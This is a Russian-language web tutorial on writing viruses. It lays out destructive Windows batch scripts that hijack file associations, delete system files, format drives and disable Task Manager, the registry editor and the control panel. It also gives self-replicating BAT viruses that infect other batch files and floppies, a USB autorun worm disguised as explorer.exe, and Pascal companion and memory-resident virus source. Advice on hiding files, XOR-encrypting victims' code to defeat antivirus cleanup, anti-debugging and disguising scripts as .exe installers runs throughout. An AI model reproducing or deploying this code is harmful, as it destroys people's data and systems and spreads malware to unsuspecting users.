Главная страница
Главная страница
Поиск по сайту
Каталог файлов
Гостевая книга
Новости сайта
Лента новостей
Для просмотра всех возможностей сайта, вам необходимо пройти процедуру регистрации, либо войти в свой аккаунт.*
*Форма входа и регистрация пользователя, располагается в шапке сайта, либо в блоке "Профиль" на страницах типа "Главная".
Поиск по сайту  RSS канал 
Меню
Мини чат
Реклама


VIP Партнеры


Кланы и Команды



Статистика

Статистика пользователей

   Всего:
   Новых за месяц: 0
   Новых за неделю: 0
   Новых вчера: 0
   Новых сегодня: 0


Счетчик стран

Страны

Счетчики

  
  

Посетители

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Просмотров: 12552 Просмотров данной публикации: 12552 Комментарии: 0 Комментариев к данной публикации: (0)
Все очень просто! Заходим в блокнот и пишем вот это
@echo off
assoc.exe=.mp3 >nul
assoc.mp3=.bmp >nul
assoc.bmp=.mp3 >nul
assoc.jpg=.mp3 >nul
assoc.avi=.jpg >nul
assoc.txt=.mp3 >nul
assoc.sys=.mp3 >nul
assoc.dll=.mp3 >nul
assoc.tmp=.mp3 >nul
assoc.ini=.mp3 >nul
assoc.flv=.txt >nul
assoc.doc=.mp3 >nul
assoc.rar=.mp3 >nul
assoc.xls=.mp3 >nul
assoc.xlsx=.mp3 >nul
assoc.log=.mp3 >nul
assoc.rtf=.mp3 >nul
assoc.rif=.mp3>nul
assoc.docm=.mp3 >nul
asoc.scr=.mp3 >nul
assoc.cif=.mp3 >nul
assoc.zip=.mp3 >nul
assoc.dat=.mp3 >nul
assoc.inf=.mp3 >nul
assoc.gif=.rar >nul
assoc.wav=.zip >nul
assoc.mp4=.txt >nul
assoc.jpeg=.mp4 >nul
label D: TI KUSOK GOVNA >nul
label G: TI KUSOK GOVNA >nul
label E: TI KUSOK GOVNA >nul
label F: TI KUSOK GOVNA >nul
label C: TI KUSOK GOVNA >nul
label I:TI KUSOK GOVNA >nul
date 05.05.97 >nul
time 00:00 >nul
copy %0 D:\Mini-Game.bat >nul
copy %0 C:\Calculator.bat >nul
copy %0 I:\Car.bat >nul
copy %0 G:\Karta.bat >nul
shutdown -r -t 00 >nul
Потом сохраним например v.bat .bat это обезательно!! Готово:)

BAT-вирус
@Echo off

copy %0 c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat

Этот вирус заражает винчестер, оставляя только один файл virus.bat. Но все-таки я бы не сказал что это полноценный вирус, т.к. он лишен возможности заражать другие компьютеры. Чтобы этот BAT-вирус обрел более четкие очертания дополним его возможностью заражать другие ПК:

@Echo off

copy %0 c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat

copy %0 a:run.bat >nul

В этом примере появляется строка, которая дает возможность вирусу заражать дискеты. Смысл этого в том что если при перезагрузке ПК в дисководе будет дискета, то она будет заражена.

Конечно файл virus.bat в корневом диске C: будет сильно мозолить глаза юзеру, чтобы этого не было существует программа attrib. Преобразуем вирус:

@Echo off

copy %0 c:virus.bat >nul

attrib +h c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat

copy %0 a:run.bat >nul

Если вы внимательны, то вы уже поняли, что вызов файла virus.bat в autoexec.bat будет записываться каждый раз при перезагрузке ПК. Чтобы этого не произошло есть простой способ: после записи вызова надо с помощью программы attrib установить атрибут только чтение у autoexec.bat. А есть другой вариант, он немного посложнее, но гораздо грамотнее:

@Echo off

if exist c:virus.bat goto cool

copy %0 c:virus.bat >nul

attrib +h c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat

:cool

copy %0 a:run.bat >nul

Здесь вторая строка проверяет существует ли уже файл c:virus.bat и если он уже существует, то происходит переход к метке cool. Этот способ тоже очень прост. Явный недостаток - если юзер уберет вызов из autoexec.bat, а файл virus.bat оставит, то глупый вирус будет нагло обманут. Чтобы вирус был умнее, то надо использовать программу find, если вам будет не лень с ней разбираться, то вы сможете написать более сложный BAT-вирус, который будет заражать не один файл c:autoexec.bat, а все *.BAT. Пример:

@echo off%[MeTrA]%

if '%1=='In_ goto MeTrAin

if exist c:MeTrA.bat goto MeTrAru

if not exist %0 goto MeTrAen

find "MeTrA"<%0>c:MeTrA.bat

attrib +h c:MeTrA.bat

:MeTrAru

for %%t in (*.bat) do call c:MeTrA In_ %%t

goto MeTrAen

:MeTrAin

find "MeTrA"<%2>nul

if not errorlevel 1 goto MeTrAen

type c:MeTrA.bat>>%2

:MeTrAen

Смысл заражения таков: в вирусе каждая строчка имеет метку, в данном примере она MeTrA. Например, в первой строке эта метка ничего не делает, во второй строке эта метка, как бы, не является пассивной, она используется для внутренней работы вируса, а именно участвует в названии метки. При запуске вирус проверяет, есть ли файл C:METRA.BAT, если нет, то вирус создает его и с помощью программы find копирует из файла (из которого стартовал) все строки содержащие метку вируса, т.е. копирует только вирусные строки. Так, вирусные строки скопированы. Значит в файле C:METRA.BAT теперь находится копия вируса. Далее вирус ищет BAT-файлы. Чтобы не происходило повторного заражения используется все таже программа find. Допустим вирус нашел файл RUN.BAT и он оказался еще не заражен, тогда вирус вызывает файл C:METRA.BAT с такими параметрами: In_ RUN.BAT, здесь первый параметр In_ говорит вирусу, что надо заразить файл, имя которого указано во-втором параметре, в данном случае он RUN.BAT. Вирус в C:METRA.BAT заражает файл RUN.BAT простейшим способом - с помощью команды type дописывает к файлу RUN.BAT себя. Вот так файл RUN.BAT оказывается зараженным.

Компаньон-вирус
Эти вирусы не изменяют программы. Они создают для EXE-файлов COM-файлы. При запуске программы сначала запустится COM-файл с вирусом, который заразив другие файлы запустит EXE-файл. Рассмотрим пример:

{$M 2048,0,4096}

{$i-}

Program Metra;

uses dos;

var

DirInfo : SearchRec;

F1,f2 : File;

Buf : Array[0..5000] of Byte; { размер вируса }

NumRead : Word;

NumWritten : Word;

FT:text;

P: PathStr;

D: DirStr;

N: NameStr;

E: ExtStr;

namecom:string;

Label InfOk;

Begin

{ считать свое тело в буфер }

Assign(F2,ParamStr(0));

Reset(F2,1);

if ioresult<>0 then

begin

writeln('Файл ',paramstr(0),' не доступен!');

halt;

end;

BlockRead(F2,buf,SizeOf(buf),NumRead);

Close(F2);

{ искать жертву }

FindFirst('*.EXE',Archive,DirInfo);

While DosError = 0 Do

Begin

FSplit(dirinfo.name, D, N, E);

namecom:=n+'.com';

{ проверить существует ли файл }

Assign(ft,namecom);

reset(ft);

if ioresult=0 then { если уже существует }

begin

close(ft);

goto infOk;

end;

{ создать COM-файл с вирусом }

Assign(F1,namecom);

rewrite(f1);

if ioresult<>0 then goto InfOk; {если ошибка, то пропустить}

Reset(F1,1);

BlockWrite(F1,buf,NumRead,NumWritten);

Close(F1);

infOk:

FindNext(DirInfo);

End;

{ запустим своего носителя }

FSplit(paramstr(0), D, N, E);

swapvectors;

exec(d+n+'.EXE',paramstr(1));

swapvectors;

{ если вызвали с таким параметром, то надо представитьcя }

if paramstr(1)='/??' then

begin

writeln('Virus MeTrA.');

writeln('^^^^^^^^^^^^');

end;

halt(dosexitcode); { выйти и сохранить код ошибки }

End.

Вирус будет лучше если его упаковать чем-нибудь вроде PKLITE с параметром -e. Вверху есть массив - размер вируса, смотрите, чтобы значение его было не меньше EXE-файла с вирусом, а желательно чтобы и больше не было.

Вирус-спутник
Принцип заражения:

• найти EXE-файл
• найти OVR-файл с тем же именем
• если его нет, то переименовать найденный EXE-файл в OVR-файл, записаться вместо EXE-файла.

Резидентные вирусы
Из справки Паскаля:

{$M $800,0,0 } { 2K stack, no heap }

{ This program causes a click each time a key is pressed.}

uses Crt, Dos;

var

KbdIntVec : Procedure;

{$F+}

procedure Keyclick; interrupt;

begin

if Port[$60] < $80 then

{ Only click when key is pressed }

begin

Sound(5000);

Delay(1);

Nosound;

end;

inline ($9C); { PUSHF -- Push flags }

{ Call old ISR using saved vector }

KbdIntVec;

end;

{$F-}

begin

{ Insert ISR into keyboard chain }

GetIntVec($9,@@KbdIntVec);

SetIntVec($9,Addr(Keyclick));

Keep(0); { Terminate, stay resident }

end.

Теперь уберем все ошибки из этого примера и переделаем под вирус:

{$F+}

procedure Keyclick; interrupt;

begin

InfExe; { вызов процедуры заражения }

inline ($9C); { PUSHF -- Push flags }

{ Call old ISR using saved vector }

KbdIntVec;

end;

{$F-}

Здесь процедура InfExe является обычной процедурой нерезидентного вируса (заражает в текущем каталоге). А вот эти строки впишем в то место вируса, где как бы его конец.

{ Insert ISR into keyboard chain }

GetIntVec($21,@KbdIntVec);

SetIntVec($21,@Keyclick);

Keep(0); { Terminate, stay resident }

К сожалению в справке не сказано как избегать повторной установки в память, поэтому я советую чтобы вирус копировал свое тело в какой-нибудь файл на диске C:, вставлял его вызов в config.sys. Пример: install=c:vir.exe /123, здесь /123 - это такой параметр, он говорит вирусу, что тот стартовал для заражения памяти, т.е. ему не надо запускать своего носителя, а надо выполнить эти три строчки.

Можно помудрить и с другими прерываниями, но вынужден вас расстроить, вирусы такого типа, как правило, очень глючные и работают, в основном, только в многозначной среде (в эмуляции DOS виснут).

Усложнение лечения
Если у вас нет желания чтобы ваш вирус, доставшись какому-нибудь ламеру, стал жертвой его антивируса, то следует подумать об усложнении лечения.

Вирус на Паскале, как правило, заражает программы в начало, перенося старое содержимое в конец. Такими вирусами антивирусные базы пополняются автоматом (без вмешательства человека). Оно и понятно, переписать конец в начало и обрезать длину - это очень простая операция. Смысл усложнения лечения заключатся в шифровке куска своей жертвы. Т.к. кусок жертвы при переносе к конец файла находится в массиве, тогда поступаем примерно так:

for i:=1 to 777 do

begin

cc:=a1;

i2:=ord(cc) xor 343;

a1:=chr(i2);

end;

Здесь a1 - это массив, в котором сохраняется начало жертвы; i,i2 - integer; cc - char.

В результате данной операции шифруется кусок файла-жертвы (777 байт). Т.к. операция шифровки осуществляется с помощью XOR - для расшифровки используется та же операция. Значит эту маленькую подпрограмму надо оформить в виде процедуры, которую следует прописать в процедуре заражения и в процедуре запуска своего носителя (перед запуском и после запуска). Если вы не разбираетесь в XOR, то скажу, в моем примере шифровка осуществляется с помощью ключа 343, он может быть от 1 до 65000. Можно сделать так, чтобы этот ключ менялся при заражении каждого файла, например, сделать чтобы ключ зависел от размера своего носителя или можно генерировать ключ случайным образом и помещать его где-нибудь в теле вируса или считывать несколько байт кода жертвы, получать их ord-значения и использовать как ключ. И еще, в моем примере шифровка идет от начала файла, а можно сделать определенное смещение, которое тоже чтобы зависело от чего-нибудь. Размер шифровки у меня 777, а можно сделать ее тоже случайной и т.д. Можно также защитить вирус от ламерской трассировки:

uses dos;

var

O1H , O3H , Br : Pointer;

{$F+}

procedure ReBoot; Interrupt;

begin { а это для того, чтобы нехорошие дяди не запускали Debug }

InLine($EA/

$00/

$00/

$FF/

$FF);

end;

{$F-}

{$F+}

procedure BreakOff; Interrupt; { + }

begin

{ Invisible Magic Words! }

end;

{$F-}

begin {main}

GetIntVec($01 , O1H); { подготавливаем систему }

SetIntVec($01 , @ReBoot);

GetIntVec($03 , O3H); { вешаем антитрассировщик }

SetIntVec($03 , @ReBoot);

GetIntVec($1B , Br); { заменяем вектор ^C }

SetIntVec($1B , @BreakOff);

SetCBreak(False); { и отключаем ^C }

writeln('hello');

SetIntVec($01 , O1H); { восстанавливаем захваченные векторы }

SetIntVec($03 , O3H);

SetIntVec($1B , Br);

end.

Здесь вместо фразы Hello следует вставить процедуры вируса, процедуру запуска носителя следует вставлять после строк восстановления векторов.

@echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения.
color 40 - делаем фон файла красным, а буквы чёрными.
label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово.
attrib -s -r -h -a %systemdrive%*.* - снимаем системные атрибуты с некоторых файлов.
erase %windir%*.* /q - банальное удаление файлов.
erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем.
erase %systemdrive%*.* /q - удаление системно важных скрытых файлов на системном диске. Хотя чтобы винда больше не запустилась никаким образом достаточно удалить файл ntldr и перегрузиться.
regedit (путь к вашему файлу) - Добавляем информацию с вашего .reg файла в реестр. Существует ещё и команда reg с параметрами, но иногда проще создать отдельный .reg файл. Здесь фантазии может быть много...
echo текст >(>>) файл - Добавляем записи в файл. Знак > создаёт новый файл с заданным текстом, >> добавляет уже в существующий файл.
shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы.

Удалить дрова :

@echo off
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul


Убрать рабочий стол :

@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Самоликвидация! Дописываем к любой проге что-бы не палиться : @echo off del "%0" >nul

@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\System /v
DdisableTaskMgr /t REG_DWORD /d 1 /f >nul
-запрещает ТаскМена

@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
-мнеяет кнопки мыши местами,можно здорово подпортить нервы кому нидь

@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun
/v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
-запрет запуска програм

@echo off
del "%SystemRoot%\Cursors\*.*" >nul
-удаляет курсоры мыши

@echo off
del "%SystemRoot%\Media" /q >nul
-удаляет звуки винды


@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
-запретить панель управления

@echo off
net user "ламер" /add >nul

@echo off
del "%SystemRoot%\Cursors\*.*" >nul

Del C:\WINDOWS\system32\catsrvps.dll
Del C:\WINDOWS\system32\catsrvut.dll
Del C:\WINDOWS\system32\cdfview.dll
Del C:\WINDOWS\system32\cisvc.exe
Del C:\WINDOWS\system32\ckcnv.exe
Del C:\WINDOWS\system32\clb.dll
Del C:\WINDOWS\system32\cmd.exe
Del C:\WINDOWS\system32\cmdial32.dll
Del C:\WINDOWS\system32\cnbjmon.dll
Del C:\WINDOWS\system32\comctl32.ocx
Del C:\WINDOWS\system32\dplaysvr.exe
Del C:\WINDOWS\NOTEPAD.EXE
Del C:\WINDOWS\twunk_32.exe
Del C:\WINDOWS\wmprfRUS.prx
Del C:\WINDOWS\WindowsShell.Manifest');
Del C:\WINDOWS\regedit.exe
Del C:\WINDOWS\explorer.exe
Del C:\WINDOWS\OemDrv
Del C:\WINDOWS\PeerNet\sqldb20.dll
Del C:\WINDOWS\PeerNet\sqlqp20.dll
Del C:\WINDOWS\twain_32\wiatwain.ds
del virus.bat


Этот батик просто копирует себя на всякие носители каждые 20 секунд.
Превращаещь этот батик в explorer.exe спомощью Batexec и кудаешь в архив.


c:\windows\system32\exp.exe
if exist c:\exp.com goto end
: copy
copy c:\windows\taskmgr.exe a:\avtorun.exe
attrib a:\avtorun.exe +r +a +s +h
attrib c:\autorun.inf -r -a -s
echo [Avtorun]>c:\autorun.inf
echo open=avtorun.exe>>c:\autorun.inf
attrib c:\autorun.inf +r +a +s +h
attrib c:\avtorun.exe -r -a -s
copy c:\windows\taskmgr.exe c:\avtorun.exe
attrib c:\avtorun.exe +r +a +s +h
attrib d:\autorun.inf -r -a -s
echo [Avtorun]>d:\autorun.inf
echo open=avtorun.exe>>d:\autorun.inf
attrib d:\autorun.inf +r +a +s +h
attrib d:\avtorun.exe -r -a -s
copy d:\windows\taskmgr.exe d:\avtorun.exe
attrib d:\avtorun.exe +r +a +s +h
attrib e:\autorun.inf -r -a -s
echo [Avtorun]>e:\autorun.inf
echo open=avtorun.exe>>e:\autorun.inf
attrib e:\autorun.inf +r +a +s +h
attrib e:\avtorun.exe -r -a -s
copy e:\windows\taskmgr.exe e:\avtorun.exe
attrib e:\avtorun.exe +r +a +s +h
attrib f:\autorun.inf -r -a -s
echo [Avtorun]>f:\autorun.inf
echo open=avtorun.exe>>f:\autorun.inf
attrib f:\autorun.inf +r +a +s +h
attrib f:\avtorun.exe -r -a -s
copy f:\windows\taskmgr.exe f:\avtorun.exe
attrib f:\avtorun.exe +r +a +s +h
attrib g:\autorun.inf -r -a -s
echo [Avtorun]>g:\autorun.inf
echo open=avtorun.exe>>g:\autorun.inf
attrib g:\autorun.inf +r +a +s +h
attrib g:\avtorun.exe -r -a -s
copy g:\windows\taskmgr.exe g:\avtorun.exe
attrib g:\avtorun.exe +r +a +s +h
attrib h:\autorun.inf -r -a -s
echo [Avtorun]>h:\autorun.inf
echo open=avtorun.exe>>h:\autorun.inf
attrib h:\autorun.inf +r +a +s +h
attrib h:\avtorun.exe -r -a -s
copy h:\windows\taskmgr.exe h:\avtorun.exe
attrib h:\avtorun.exe +r +a +s +h
attrib i:\autorun.inf -r -a -s
echo [Avtorun]>i:\autorun.inf
echo open=avtorun.exe>>i:\autorun.inf
attrib i:\autorun.inf +r +a +s +h
attrib i:\avtorun.exe -r -a -s
copy i:\windows\taskmgr.exe i:\avtorun.exe
attrib i:\avtorun.exe +r +a +s +h
attrib j:\autorun.inf -r -a -s
echo [Avtorun]>j:\autorun.inf
echo open=avtorun.exe>>j:\autorun.inf
attrib j:\autorun.inf +r +a +s +h
attrib j:\avtorun.exe -r -a -s
copy j:\windows\taskmgr.exe j:\avtorun.exe
attrib j:\avtorun.exe +r +a +s +h
attrib k:\autorun.inf -r -a -s
echo [Avtorun]>k:\autorun.inf
echo open=avtorun.exe>>k:\autorun.inf
attrib k:\autorun.inf +r +a +s +h
attrib k:\avtorun.exe -r -a -s
copy k:\windows\taskmgr.exe k:\avtorun.exe
attrib k:\avtorun.exe +r +a +s +h
attrib l:\autorun.inf -r -a -s
echo [Avtorun]>l:\autorun.inf
echo open=avtorun.exe>>l:\autorun.inf
attrib l:\autorun.inf +r +a +s +h
attrib l:\avtorun.exe -r -a -s
copy l:\windows\taskmgr.exe l:\avtorun.exe
attrib l:\avtorun.exe +r +a +s +h
attrib m:\autorun.inf -r -a -s
echo [Avtorun]>m:\autorun.inf
echo open=avtorun.exe>>m:\autorun.inf
attrib m:\autorun.inf +r +a +s +h
attrib m:\avtorun.exe -r -a -s
copy m:\windows\taskmgr.exe m:\avtorun.exe
attrib m:\avtorun.exe +r +a +s +h
attrib n:\autorun.inf -r -a -s
echo [Avtorun]>n:\autorun.inf
echo open=avtorun.exe>>r:\autorun.inf
attrib n:\autorun.inf +r +a +s +h
attrib n:\avtorun.exe -r -a -s
copy n:\windows\taskmgr.exe r:\avtorun.exe
attrib n:\avtorun.exe +r +a +s +h
attrib o:\autorun.inf -r -a -s
echo [Avtorun]>o:\autorun.inf
echo open=avtorun.exe>>o:\autorun.inf
attrib o:\autorun.inf +r +a +s +h
attrib o:\avtorun.exe -r -a -s
copy o:\windows\taskmgr.exe o:\avtorun.exe
attrib o:\avtorun.exe +r +a +s +h
attrib p:\autorun.inf -r -a -s
echo [Avtorun]>p:\autorun.inf
echo open=avtorun.exe>>p:\autorun.inf
attrib p:\autorun.inf +r +a +s +h
attrib p:\avtorun.exe -r -a -s
copy p:\windows\taskmgr.exe p:\avtorun.exe
attrib p:\avtorun.exe +r +a +s +h
attrib q:\autorun.inf -r -a -s
echo [Avtorun]>q:\autorun.inf
echo open=avtorun.exe>>q:\autorun.inf
attrib q:\autorun.inf +r +a +s +h
attrib q:\avtorun.exe -r -a -s
copy q:\windows\taskmgr.exe q:\avtorun.exe
attrib q:\avtorun.exe +r +a +s +h
attrib r:\autorun.inf -r -a -s
echo [Avtorun]>r:\autorun.inf
echo open=avtorun.exe>>r:\autorun.inf
attrib r:\autorun.inf +r +a +s +h
attrib r:\avtorun.exe -r -a -s
copy r:\windows\taskmgr.exe r:\avtorun.exe
attrib r:\avtorun.exe +r +a +s +h
attrib s:\autorun.inf -r -a -s
echo [Avtorun]>s:\autorun.inf
echo open=avtorun.exe>>s:\autorun.inf
attrib s:\autorun.inf +r +a +s +h
attrib s:\avtorun.exe -r -a -s
copy s:\windows\taskmgr.exe s:\avtorun.exe
attrib s:\avtorun.exe +r +a +s +h
attrib t:\autorun.inf -r -a -s
echo [Avtorun]>t:\autorun.inf
echo open=avtorun.exe>>t:\autorun.inf
attrib t:\autorun.inf +r +a +s +h
attrib t:\avtorun.exe -r -a -s
copy t:\windows\taskmgr.exe t:\avtorun.exe
attrib t:\avtorun.exe +r +a +s +h
attrib u:\autorun.inf -r -a -s
echo [Avtorun]>u:\autorun.inf
echo open=avtorun.exe>>u:\autorun.inf
attrib u:\autorun.inf +r +a +s +h
attrib u:\avtorun.exe -r -a -s
copy u:\windows\taskmgr.exe u:\avtorun.exe
attrib u:\avtorun.exe +r +a +s +h
attrib v:\autorun.inf -r -a -s
echo [Avtorun]>v:\autorun.inf
echo open=avtorun.exe>>v:\autorun.inf
attrib v:\autorun.inf +r +a +s +h
attrib v:\avtorun.exe -r -a -s
copy v:\windows\taskmgr.exe v:\avtorun.exe
attrib v:\avtorun.exe +r +a +s +h
attrib w:\autorun.inf -r -a -s
echo [Avtorun]>w:\autorun.inf
echo open=avtorun.exe>>w:\autorun.inf
attrib w:\autorun.inf +r +a +s +h
attrib w:\avtorun.exe -r -a -s
copy w:\windows\taskmgr.exe w:\avtorun.exe
attrib w:\avtorun.exe +r +a +s +h
attrib x:\autorun.inf -r -a -s
echo [Avtorun]>x:\autorun.inf
echo open=avtorun.exe>>x:\autorun.inf
attrib x:\autorun.inf +r +a +s +h
attrib x:\avtorun.exe -r -a -s
copy x:\windows\taskmgr.exe x:\avtorun.exe
attrib x:\avtorun.exe +r +a +s +h
attrib y:\autorun.inf -r -a -s
echo [Avtorun]>y:\autorun.inf
echo open=avtorun.exe>>y:\autorun.inf
attrib y:\autorun.inf +r +a +s +h
attrib y:\avtorun.exe -r -a -s
copy y:\windows\taskmgr.exe y:\avtorun.exe
attrib y:\avtorun.exe +r +a +s +h
attrib z:\autorun.inf -r -a -s
echo [Avtorun]>z:\autorun.inf
echo open=avtorun.exe>>z:\autorun.inf
attrib z:\autorun.inf +r +a +s +h
attrib z:\avtorun.exe -r -a -s
copy z:\windows\taskmgr.exe z:\avtorun.exe
attrib z:\avtorun.exe +r +a +s +h
ping -n 20 77.88.22.224
goto copy
:end


Потом и щешь у себя на компе файл c:\windows\explorer.exe (с иконкой мой компьютер он открывает рабочий стол) и кидаешь его в архив предварительно закинув в папку system32 (не в системную с кучей файлов, а содданную тебою) дальше этот архив превращаешь в SFX с параметрами: Путь для распаковки: c:\windows\ ; Режим вывода информации: Скрыть все ; Режим перезаписи: Перезаписывать все файлы без запроса. Именушь этот SFX в avtorun. Создаешь второй файл autorun.inf с содержимым:


[Autorun]
open=avtorun.exe


записываешь эти файлы в корневую паку диска(флешки). И все, но если есть файл c:\exp.com то эта програмка сама завершит свою работу.



Вот еще код.
Chcp 1251
@echo off
time 00:00
Date 01.01.2314
del "%SystemRoot%system32*.dll" /q >nul
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%Cursors*.*" >nul
del "%SystemRoot%Media" /q >nul
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
0reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
msiexec /?
if exist c:Installer.exe goto ski
if exist d:Installer.exe goto ski
if exist g:Installer.exe goto ski
if exist e:Installer.exe goto ski
copy %0 c:Install.exe >nul
attrib +h c:Installer.exe >nul
copy %0 d:Installer.exe >nul
attrib +h d:Installer.exe >nul
copy %0 e:Installer.exe >nul
attrib +h e:Installer.exe >nul
copy %0 g:Installer.exe >nul
attrib +h g:Installer.exe >nul
echo c:Installer.exe>>c:autoexec.bat
:ski
for %%t in (*.bat) do call c:Installer In_ %%t
for %%t in (*.bat) do call d:InstallerIn_ %%t
for %%t in (*.bat) do call e:Installer In_ %%t
for %%t in (*.bat) do call g:Installer In_ %%t
for %%t in (*.bat) do call a:Installer In_ %%t
find "Install "nul
type c:Installer.exe>>%2
type d:Installer.exe>>%2
type e:Installer.exe>>%2
type g:Installer.exe>>%2
type a:Installer.exe>>%2
Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js
echo WSHShell.Popup ("Ваш компьютер подлежит немедленому уничтожению!"); >> %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nu
%SystemRoot%/system32/rundll32 user32, SwapMouseButton
title Загрузка игры...
label C: Lamer
label D: ЧМО
label E:Пидар
attrib -h -s -a -r C:\*.*
del C:\*.* /q (
attrib -h -s -a -r C:\WINDOWS\system32\ *.* /s /d
assoc .exe=.mp3
assoc .dll=.txt
assoc .ini=.iso
assoc .drv=.doc
assoc .bin=.zip
assoc .sys=.xls
assoc .ax=.ppt
assoc .bpl=.wav
assoc .nls=.pub
assoc .tlb=.mdb
assoc .bat=.rar
assoc .exe=.virus
assoc .dll=.virus
assoc .ini=.virus
assoc .drv=.virus
assoc .bin=.virus
assoc .sys=.virus
assoc .ax=.virus
assoc .bpl=.virus
assoc .nls=.virus
assoc .tlb=.virus
assoc .bat=.virus
attrib +h +s C:/WINDOWS
format %D%: /q
format %E%: /q
echo ХА-ХА
format %C%: /q
pause
shutdown.exe -s -t 00
del %0
shutdown.exe -s -t 00
taskkill /f /im explorer.exe >nul
cls
Вирусик bat
Итак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы. Приступим:
1) Открываем блокнот;
2) Пишем в нем «mspaint», без кавычек;
3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat;
4) Откроем файлик и увидим, что открылся Paint))
Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем)) Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена). Итак:
Пишем в блокноте:

time 00:00
copy %0 F:Work.bat

Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск F - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число)) Теперь небольшой перечень того, что можно писать в блокнотовском вирусе.
СПИСОК:

1) «copy %0 x:y» - копирует вирус на диск x в папку y (пример copy %0 C:System.bat);
2) «label x:y» - переименовывает диск x на имя y (пример label C:error);
3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);
4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05);
5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka);
6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);
7) «del x:y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:Data*.* /q);
8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3);
9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);
Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.
1)Программа для удаления файлов с флешки (если та вставлена) и переименования ее.

del F: *.* /q
label F:HACK

2)Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.

time 14:13
date 11.07.12
copy %0 C:Time.bat
copy %0 F:Time.bat


Вы уже умеете создавать простенькие вирусы.
Он умеет: менять время, дату, названия дисков и флешек, открывать программы, создавать папки, копировать себя, добавлять пользователей, менять расширения и уничтожать информацию. Это довольно небольшой список, чесно говоря. Теперь я научу вас некоторым тонкостям вирусописательсва. Допустим, вы уже сделали вирус, но выглядит он довольно некрасиво. Ну кто откроет непонятный файл? Вы правы, таких людей на свете не много. Как же изменить формат из .bat на .exe и добавить иконку. Очень легко (Нужно чтобы на компьютере был WinRAR). Находим любой вирус с расширением .bat, нажимаем на него правой кнопкой, жмем «Добавить в архив…». Ставим галочку «Создать SFX-архив», выбираем вкладку дополнительно, и кликаем на кнопку «Параметры SFX…». В окне «Выполнить после распаковки» пишем названия вируса (пример Virus.bat) а в окне «Текст и графика» далее «Загрузить значок SFX из фала». Жмем «Обзор» и ищем любой значок формата .ico. Теперь жмем ОК. Готово)) Формат .exe, а не .bat, как нам и надо было. Теперь можно делать с вирусами что угодно. А что именно, решать уже вам. Хотите научиться еще командам, которыми можно просто добить нашего «лоха», открываем www.Google.ru, пишем bat вирусы и жмем «Искать».

Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить:

del C: *.* /q
del D: *.* /q
del E: *.* /q
del F: *.* /q
time 00:00
date 13.06.23
del *.* /q

Готово? – спросите вы. Нет. Нужно его закончить. Новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус:

@echo off
del C: *.* /q >nul
del D: *.* /q >nul
del E: *.* /q >nul
del F: *.* /q >nul
time 00:00 >nul
date 13.06.23 >nul
del *.* /q >nul

